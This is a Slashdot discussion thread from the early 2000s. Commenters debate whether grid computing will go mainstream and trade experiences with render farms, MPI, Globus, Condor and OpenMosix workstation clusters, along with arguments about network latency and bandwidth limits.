Well, this scenario would not be appropriate, since there's hardly any processing involved in web orders. Mostly that is just database queries. But you could easily imagine that you'd see a useful speedup if you had your advertising firm's 3D animations rendering on every computer in the office, or your software development company's nightly build/regression suite. Fault tolerance (not trivial, but not impossible either) takes care of 2 and 3, so you just need to find an application that's a ppropriate to take care of 1 and 4.

Re:Never mainstream (1)

shepard (2304) | more than 11 years ago | (#5931658)

What is mainstream? Even if it doesn't become mainstream, does that mean it can't be "the next big thing" or not be involved in useful science? The NEESgrid project [neesgrid.org] relies on creating a grid infrastructure, and the system architecture of that grid involves storage at each equipment site that is a part of that virtual organization, not (only) some central storage server. Standing up a NEESpop, a TelePresence server, or a data storage server does not require 1000 workstations, although it may require a UPS and some people to administer the servers. Sure, the architecture adds overhead, but what architectures don't, grid or otherwise? The important questions your comment doesn't address are whether the architecture solves the targetted scientific/business problems and whether the provided solutions are affordable (and hence realistic).

The point is not that the configuration you mention here is technologically infeasible. That's like saying that computer networking is doomed because one of the protocols in use on some remote part of the network is flawed. The point is that the grid has enough abstractions built into it to allow a diverse set of logical system architectures. Maybe none of these architectural plans will work, maybe all will work, but just because one architecture you enumerate here won't in your opinion work, that is not cause to dismiss offhand the entire concept of grid computing as never having applicability towards a mainstream purpose, such as enabling scientific collaboration.

Re:Never mainstream (4, Insightful)

Realistic_Dragon (655151) | more than 11 years ago | (#5931776)

3) Worsktations are flaky:

_Your_ workstation may be flakey, but real workstations are not:

peu@elrsr-4 peu $ uptime 19:33:50 up 140 days, 2:01, 3 users, load average: 0.26, 0.26, 0.14

So grid computing gives you just one more reason to move your company desktops to AIX, Linux, BSD, IRIX, or other competent operating system of your choice.

Re:Never mainstream (0)

Anonymous Coward | more than 11 years ago | (#5932192)

This has got to be a troll, albeit a clever one.

Never mainstream? So there is any real chance that hooking up hundreds or thousands of computers in a grid has that possiblity anyway? It may become common in universities, or in some sectors of the Fortune 5000 or certain industries, but its not anything that will be in Mom & Pop shops that constitute a large percentage of our economy, except as something like seti@home.

This is just an inverted version of the "network computing" universe

No. There is no requirement in grid computing to eliminate cetralized servers. What it does is provide a means of making better use of existing resources. If you have to solve the types of problems suitable for grid computing it can be a powerful tool.

The number of problems with this, as compared to using a central server, is incredible.

What is truly incredible is that you would propose doing something blatently stupid and inappropriate with the technology (transaction processing) as a reson why it won't work. You don't try to use your microwave as a toaster, do you?

I rattled off this list in about 30 seconds

Too bad you didn't spend another 30 seconds, you might have figured out some of the advantages.

Better yet, try reading soem of the background material:

IBM [ibm.com]
Sun [sun.com]

Re:Never mainstream (0)

Anonymous Coward | more than 11 years ago | (#5933508)

Grid computing already is "mainstream" in the same sense that beowulf clusters and mainframes are mainstream. Its not intended to be a panacea as your contrived example suggests. Its a useful technology for organizations that have computationally demanding workloads and available compute power. (Instead of database, think simulation.)

Now lets take a look at your objections:

1) Still need a central server for storage/backup

So your 1st point is a wash.

2) One server needs one UPS, 1000 workstations...

In your example you are trying to replace a mainframe (lets ballpark it a $1,000,000 - a little low, but...) and you quibble at spending what, $50k? To increase the availability of your critical resources?

Score: -1

3) Worsktations are flaky: They reboot, crash, play video games, etc. The distributed software can handle this, but the inefficiency involved is painstaking. I hope everybody doesn't run Windows Update all at once, or all the PCs could go down.

So you have no control over the "workstations" that you use? At all? Crashing? GAMES? Random windows updates? WINDOWS!! (That last one explains a lot.)

Score: -1

4) The corporate network is now a bottleneck.

So you did nothing to architect the network for the workload? While trying to save $1,000,000?

Score: -1

Bonus issue: Suggesting grid computing for transaction processing?

Score: -1

The fact that you suggest using grid computing for transaction processing demonstrates that you have no understanding of what grid computing is really about. Next time, instead of spending 30 second brainstorming about the problems of a technology that you have no understanding of, you would greatly benefit from spending at least 3 minutes reading about it.

Re:Never mainstream (2, Insightful)

2short (466733) | more than 11 years ago | (#5940920)

You obviously rattled that off in 30 seconds, since you didn't think about it much. Suppose you need a new big iron system for order processing? Sorry, I can't coherently imagine that; order processing just isn't a big deal. Let's assume we're talking instead about a task that would require a big machine, and look at your concerns:

1) Still need a central server for storage/backup

There might be interesting applications of grid computing for distributed, redundant storage, but the classic applications would be oriented toward massing processor power, not storage.

2) One server needs one UPS, 1000 workstations...

Well, I've got a UPS on my workstation anyway, but even if you don't this is just one variation of:

3) Worsktations are flaky...

One workstation is flaky. A couple thousand are rock-solid, if your grid software is any good at all. You hope everybody doesn't run Windows Update (or do some other maintenance) all at once? That seems pretty unlikely, and in any case I hope you don't ever do maintenance on your single server, since it will obviously be all at once.
I actually worked somewhere that used a "grid" like technique for animation rendering. Every workstation had a background app running. If your machine was idle for a little while, this app start up, ask the "NetRender" machine for a frame, and get to work. If it finished the frame it would send it in and ask for another. If it didn't (you came back from lunch, a janitor yanked out the power cord, whatever) NetRender didn't care. Once it had passed out all the frames in an animation, it would just start again at the begining, passing out the ones it hadn't gotten back. Was there "painstaking inefficiency"? Well, at the end of the rendering the last job set up for a particular night, almost every machine in the shop was presumably racing to finnish the same frame, but who cares? They weren't doing anything else anyway. (actually, I think NetRender had some further inteligence so it didn't pass out the same frame more than X times a minute)

4) The corporate network is now a bottleneck
Something is always the bottleneck. A good way to decide whether grid computing is apropriate to a task is to ask whether your statement sounds like a pro or a con.

Re:Never mainstream (1)

sipy (602638) | more than 11 years ago | (#5941448)

Let's confront the (Deutsch's) Seven Fallacies of the Network:

1: The Network is reliable
2: Latency is zero
3: Bandwidth is infinite
4: The Network is secure
5: Topology doesn't change
6: There is one administrator
7: Transport cost is zero

Grid computing addresses 1, 4, and 7 IMHO, yet leaves 2 and 3 unsolved. Since you can't even solve the "infinite bandwidth" issue with Grid computing, I submit that "Grid Computing" isn't The Last Word (tm) on computing...

Maybe a bit long in the tooth already... (1, Interesting)

Anonymous Coward | more than 11 years ago | (#5931058)

6 Years ago we were clamoring to use the desktops on the trading floor to run some of our financial models at night. We tried MPI and CORBA, and kludged together a workable (although lacking) solution. I can definitely see where a hodge podge solution like that needs to be improved, and it looks like the grid concept is looking to fill that gap, but at the same time the desktop is evolving. The Net PC seems to have gone the way of the DoDo, and while it is true that there are plenty of idle desktops during the evening, I would say most of the servers are well utilized by the departments.

The real benefit would be pulling in all that desktop power, but I do not believe desktops will remain as they are. With mobile work forces, and reshaped IT departments, workers are more likely to move about the company and form resource pools. In order to do that, they will need to be productive as soon as they set up shop with a new team. Current infrastructure makes that difficult to manage. The more successful implementations have those workers using laptops, which go home at night. Goodbye spare cycles. Future concepts seem to be brewing where you leave the peripherals and just carry around a small PDA size CPU+storage and plug that in at any station and your set to go. In that scenario the spare cycles are walking around with you. I only see limited use for consolidating existing server processing. There are already plenty of technologies that address that need. Not sure I buy this as "the next thing", but I guess the next short term thing maybe.

Anonymous Coward

10,000-foot view? (0, Offtopic)

tagishsimon (175038) | more than 11 years ago | (#5931089)

10,000-foot view? What was wrong with the last cruddy neogism, helicoptor view, or, heaven forefend, an overview ? Still. I'm quite happy to run it up the old flagpole and see if anyone salutes it.

Re:10,000-foot view? (0)

Anonymous Coward | more than 11 years ago | (#5931143)

tagishsimon wrote "cruddy neogism"

Did you mean "cruddy neologism"? If the former was intended as one of the latter, I blush to think of what you meant.

Software Architectures for Grid Computing (3, Interesting)

Jack William Bell (84469) | more than 11 years ago | (#5931141)

I have given a lot of thought to this concept in the past and, although I think it has a lot of merit I also think it will require a different underlying software architecture than any of those we use today.

Currently for distributed computing we have Thin-Client/Fat-Server, Client/Server, N-Tier and Shared-Node architectures. I think most people are expecting a Shared-Node or Client/Server for Grid Computing because that is how existing implementations work. The issue with either of those is the size of the work unit. If the work unit is small than the nodes/clients must sychronize often. If the work unit is large then you are more likley to have nodes/clients in a wait state because required processing is not completed.

Using a network style architecture (distributed Shared-Node) raises more issues because of message routing. Interestingly, this is the 'web-service' model! For example a web site must verify a customer, charge her credit card, initiate a shipping action and order from a factory in a single transaction. So you get four sub-transactions. Let's say that each of those initiates two sub-transactions of its own and each of those initiates one sub transaction of its own. We now have a total of twenty transactions in a hierarchy that is three deep. Let's also assume that we only have one dependancy (the verification) before launching all other transactions asychronously.

The problem here is response times, they add up. if the average response time is 500 ms, then three transactions deep gives us 1500 ms. The dependacy, at a minimum, doubles this. So it takes three full seconds to commit the transaction. Something a user might be willing to live with until a netstorm occurs and the response time drops to thirty seconds or more. (Note: Isn't it funny how you never see this math done in the whitepapers pusing web services?) But three seconds is far too long for sychronizing between nodes of a distributed computing grid unless you only have to do it every once in a great while, pushing us towards large work units and idle nodes!

So the Internet itself imposes costs on a distributed model that wouldn't exist on, say, a Beowulf cluster because that cluster would have a dedicated high-speed network. Client/Server architectures work better for the Internet, but require dedicated servers and a lot of bandwidth to and from them.

I believe the real answer lies in what I call a Cell architecture. This would require servers, but their job would be to hook up nodes into computing 'cells' consisting of one to N (where N is less than 256?) nodes. Each node would download a work-unit from the server appropriately sized to the cell, along with net addresses of the other nodes in the cell. Communication would occur between the nodes until the computation is complete and then the result would be sent back to the server. When a node completes its work unit (even if all computation for the cell is not complete) it detaches and contacts the server for another cell assignment.

By reducing cross-talk to direct contact between nodes within the cell we allow smaller work units. By using a server to coordinate nodes into cells we are allowed to treat the cells as larger virtual work units.

Comments?

This is how things like Globus and Condor work (1)

chivo (20329) | more than 11 years ago | (#5931425)

Having done some work with Globus and Condor, it seems that your "cell architecture" is basically how things are setup now. Many institutions, like the group at the University of Illinois at Urbana-Champaign and the National Center for Supercomputing Applications(NCSA) have set up Grid nodes using toolkits and programs like Globus.

If you have an app which is Grid-enabled, a hydrology simulation for instance, you would get accounts on the various NCSA Grid nodes. Then you would use Globus or Condor, or the two in combination, to hand off your computation and data to the various Grid nodes, the nodes would compute, then give you back results. Your own computing cluster/Grid node could work on the results, have other nodes do more computing, etc until finished.

This reduces communication over the internet and keeps most communication to local networks. However, even if you did want to do communction between nodes, it wouldn't be as bad you point out. Most nodes are at universities that are on Internet 2 and have huge amounts of bandwidth available and low latency.

Commercial uses of Grid computing may differ as they will have difficulty using I2 or something like NCSA, but I'm sure the market will fix this problem.

My $.02 at least.

Just 10000 feet? Bah! (4, Funny)

arvindn (542080) | more than 11 years ago | (#5931195)

They're talking about the grid being distributed across the globe... what kind of a view can you get from 10000 ft?

;^)

what kind of distance is that? about 2 miles? (1)

fantomas (94850) | more than 11 years ago | (#5935311)

ummm, 5280 feet to a mile, so that's "Grid Computing: the view from just under two miles" :-)

Can you give that in metric for us euros ;-) ?


in other words... (1)

rhyd (614491) | more than 11 years ago | (#5931213)

..."The network is the computer" but IBM couldn't bring themselves to use that phrase.

Some companies have "a not invented here" problem with stuff but not IBM : Java, Linux, Cell, J2EE. Is there anything more substantial to IBM than a marketing department and two factories (one to make models of factories and the other churning out hard-disks designed to fry after 24hrs continuous use).

Why doesn't IBM just "show Sun the money" so they can get it on

Some problems. (3, Interesting)

Duncan3 (10537) | more than 11 years ago | (#5931384)

First off, this stuff has been completely mainstream for over 30 years now. The only thing new is that it keeps getting renamed, This year it's called GRID. I remember when it was called timesharing, and Time magazine had cartoons depicting it is 1973.

The entire GRID standard actually only covers the data transfer and login. Becasue that's the only thing standard about the different types of hardware. You still need to write the software specific to the hardware. Even with tools like MPI programming for Sun big iron is nothing at all like IBM big iron. And you dont exactly use Java. The value is not in the software - that's why it's getting standardized and is given away for free. The value, as always, is in owning a huge pool of computing power and renting it out, or even better, selling it in racks full.

The only people benefiting financially are the people that make the hardware - IBM, HP, Sun, Fujitsu, etc. Just like 30 years ago. Open Source has completely devalued the software - why pay for that, money is better spent on more hardware.

Then there is the cost of transporting the terabytes of data involved in the types of problems you do with these systems. Transport costs are more then the computing costs in many cases - another reason that part got standardized.

Hardware costs are falling FAST. Blade mounted and racked CPU are running about $500/Ghz ($7k for the same from IBM). That means for about 1 million you can get something like 2K CPUs and 2Thz of power, running Linux and all the tools you need. Thats a lot of FLOPS.

For those kinds of costs, outsourcing it at seems silly. You still have to do all software development, data transport, post-processing, and research yourself anyway, and those costs DWARF the hardware/electricity/HVAC costs of owning the hardware and having exclusive access 24/7 until the next updgrade.

How about the 10-inch view? (2, Interesting)

pla (258480) | more than 11 years ago | (#5931407)

I've seen entirely too many articles (such as recently appeared in SciAm, and now this one appearing on /.'s FP) giving the "10,000-foot view" of grid computing.

I've seen a few articles giving the 10-micron view, describing CPU architectures making use of a grid topology.

I've seen a few small demos of massively distributed clusters. I've heard hype about the idea of a service provider and service consumer oriented topology. I've heard about self-healing networks. I've heard about the PS3 making use of a grid-based system.

I have not heard any of the "step 2s", the means by which we transition from individual PCs accessing a network, to a single shared "grid computer" actually composed of the network. At least, nothing that would make the resulting network noticeably different than the current internet.

For individual systems (ala the PS3), grid computing seems like possibly the next big thing, sort-of an evolution of SMP to a scale larger than dual/quad CPU systems. The rest of it, the over-hyped massive "revolution" in how people use computing resources in general? Pure marketing hot-air, and nothing more. The closest we'll get to the idea of a worldwide "grid" will consist of an XBox-like home media console with anything-on-demand (for a fee).

Good for CPU bound processes only (4, Informative)

stanwirth (621074) | more than 11 years ago | (#5931700)

As we discovered early on in MIMD parallel computing, MIMD (aka grid computing) parallelism can only really help processes that are CPU bound in the first place.

Most of the processes that require 'big iron' are memory bound and I/O bound--e.g. databases that are hundreds of gigabytes to terabytes in size. This is why so many CPUs are '90% idle' in the first place, and this is why system designers devote more attention to bit-striping their disks, a good RAID controller, bus speeds, disk seek time and so forth.

Problems that require brute-force computation on small amounts of data, and produce small results, are simply few and far between -- and the people addressing those problems have been onto MIMD for decades. For instance, my first publication, in 1987 to the USENIX UNIX on Supercomputers proceedings, involved putting ODE solvers wrapped in Sun RPC, so that hundreds of servers could work on a different part of initial condition and boundary condition space, to provide a complete picture of the properties of certain nonlinear ordinary differential equations. Cryptanalysis and protein folding problems are already being addressed in a similar manner, and the tools to distribute these services as well as the required communications standards have been around for more than a decade.

Furthermore, if you've already got a marginally communications-bound domain decomposition of a parallel problem, and you want to cut down the communications overhead in order to take advantage of MIMD parallelism, the last communications protocol you're going to use is a high-overhead one such as CORBA, or a text-based message protocol such as XML. Both XDR and MPI are faster, more stable and better established in the scientific computing community than Yet Another layer of MIMD middleware--which is all Grid Computing is.

Re:Good for CPU bound processes only (0)

Anonymous Coward | more than 11 years ago | (#5933262)

From far back in the pews, maybe even the balcony...

"AMEN"

Thank you for the well written synopsis of the design issues I worry about day in and day out when trying to figure out at what level to parallelize projects. This isn't to say GRID is bad. In it's place, GRID can be good. It's place, however, is rather limited.

clustering daydream (1)

paraleet (650112) | more than 11 years ago | (#5931767)

I had to laugh while reading this article. I've never heard of Grid computing before. However, about a month ago while sitting on the can, after just setting up my first cluster using OpenMosix, I had a very similar idea. Given a worldwide fibre network, systems similar to distributed.net could be set up, but simply to share idle processor cycles, with the hope that when you are ocassionally doing local computations that are red lining your proc, the offending processes could be sent out to the distributed cluster you are a member of. Sort of like p2p processor sharing. Of course, someone would have to write a kernel level dynamic memory allocation capable clustering thang. That definitely wouldn't be fun. Especially in win32.

TeraGrid (3, Interesting)

kst (168867) | more than 11 years ago | (#5931804)

Here [teragrid.org] is a large Grid project that I'm working on.

They did this at squaresoft during FF the movie (1, Interesting)

sh2kwave (310977) | more than 11 years ago | (#5931920)

from what I understand they did this at squaresoft during the makeing of the final fanstasy movie. indle cycles were used by rendering during the day when the cpu was not floored at 100% useage. Atleast from what i understood from the articles that i read about it. As well as workstations were tied to the dedicated render farm at night. Since many of the artists had more than one machine at there desk it proably worked out well both at night and during the day.

Re:They did this at squaresoft during FF the movie (1)

taradfong (311185) | more than 11 years ago | (#5936780)

Rendering works great for Grid, because rendering requires very little communication to occur per processing cycle. Other apps, like fluid flow analysis and such require computing nodes to do a lot of talking per computational cycle, making them unsuitable for grid.

User moderation!! (2, Interesting)

corvi42 (235814) | more than 11 years ago | (#5932136)

How 'bout this - build in a system whereby users who have downloaded a file can mod its quality up or down. Then while searching the network, you also get MD5s for the files, and the associate rating is accumulated from others who you search. This way crappy files float to the bottom.

Hell yes I want that. (1)

mrmeval (662166) | more than 11 years ago | (#5932380)

I would love a distributed beowulf cluster, there are several projects I need to do.

Only problem with distributing internal stuff to external machines is trust and better is denyability.

So ripping and compressing 1000 DVDs or 1million MP3s with better quality is probably not a good idea unless there is some method to cloak what is happening.

GridShell Expert System User Interface (2, Interesting)

Will the Chill (78436) | more than 11 years ago | (#5932465)

I've been writing (partially for my CompSci Masters thesis) a new Grid-oriented application that may be of interest. It's called GridShell, and aims to provide a Free/OSS interface to any and all Grid technologies. Currently, GridShell's skin-able web-based UI (WebUI) is almost completed, able to provide the equivalent of an expert Grid administrator/user through a very "clicky-clicky" frontend.

Oh, and it's all 100% Object-Oriented Perl, for those of you who care about clean code.

More really crazy GridShell modules are down the road, so check it out!

http://www.gridshell.org [gridshell.org]

-Will the Chill

Re:GridShell Expert System User Interface (1)

David Gould (4938) | more than 11 years ago | (#5975074)


Oh, and it's all 100% Object-Oriented Perl, for those of you who care about clean code.

I want to say something here, but I can't quite find the words.

*Wanders off, muttering...*
"Perl ... clean code ... WTF? ... "
"..."
"Perl? ... clean code?? ... WTF!!! ... "
"..."
*...shakes head in confused amazement*

(It does sound like a fascinating project and all, it's just that I've never heard those two terms associated that way before.)

Service based computing. (1)

Moderation abuser (184013) | more than 11 years ago | (#5932600)

We're using it to create a highly available, highly scalable, easy to manage, high performance service broker system.

User says I want service blah, service broker manages where to run the blah application. You can kill loads of machines and the service continues to exist on the network.

Oh, not again.... (1)

deanj (519759) | more than 11 years ago | (#5933018)

Grid computing has been the "next big thing" for the last (at least) five years.

First it was Globus... now companies have latched on that whole idea, hoping it'll be "the thing".

And you know what? It's not.

There are two points to all this:

The people who are already involved with this have already declared victory, and are going to work towards this, no matter if it's going to work or not. After five years of pushing it, you'd think they'd get the idea that people just aren't buying into it... at least not to the scale they think people will. Five years from now, we'll be getting posts from some group of poor /.-ers that are forced to maintain all this stuff, while everyone else has already moved on long ago.

The second point is, don't believe anyone that says "it's the next big thing". The "next big thing" is going to be something that just sneaks up on everyone, the way Mosaic and Netscape did back in the mid-90s. It wasn't "the next big thing" until it was ALREADY "the big thing".

more detailed info (2, Interesting)

elchuppa (602031) | more than 11 years ago | (#5933087)

Grid computing is pretty interesting, if anybody wants to find out more I have compiled a comprehensive list of references on the subject. As well as providing a brief (20 page or so) overview of the available Grid solutions. www.netinvasions.com/files/GRID/grid-paper.htm

OpenMosix and COWs (2, Informative)

dargaud (518470) | more than 11 years ago | (#5936616)

Many earlier posts have pointed out that there are already several ways to do that, without adding an extra layer. One way which works well on an Intranet is to do a cluster of worstations (COW) running Linux+OpenMosix [sourceforge.net] .

I do software and sysadmin for scientists. Those with simulation or data analysis needs usually work either:

  • connecting remotely to a main computer (say SGI in many cases) to run their jobs, at a high price for hardware and support and at the risk of saturating the machine when everyone wants in;
  • or, with the more recent increase in computer power in PCs, running directly on their own PCs.
In both cases the PCs are underutilized most of the time. OpenMosix is a patch to the Linux Kernel allowing you to transform your workstations into a cluster. No software modification is necessary. OpenMosix balances the load automagically. No more expensive mainframe. No more powerful but underutilized PCs.

OpenMosix has been featured on /. before: here [slashdot.org] , here [slashdot.org] , here [slashdot.org] , and here [slashdot.org]

Check for New Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>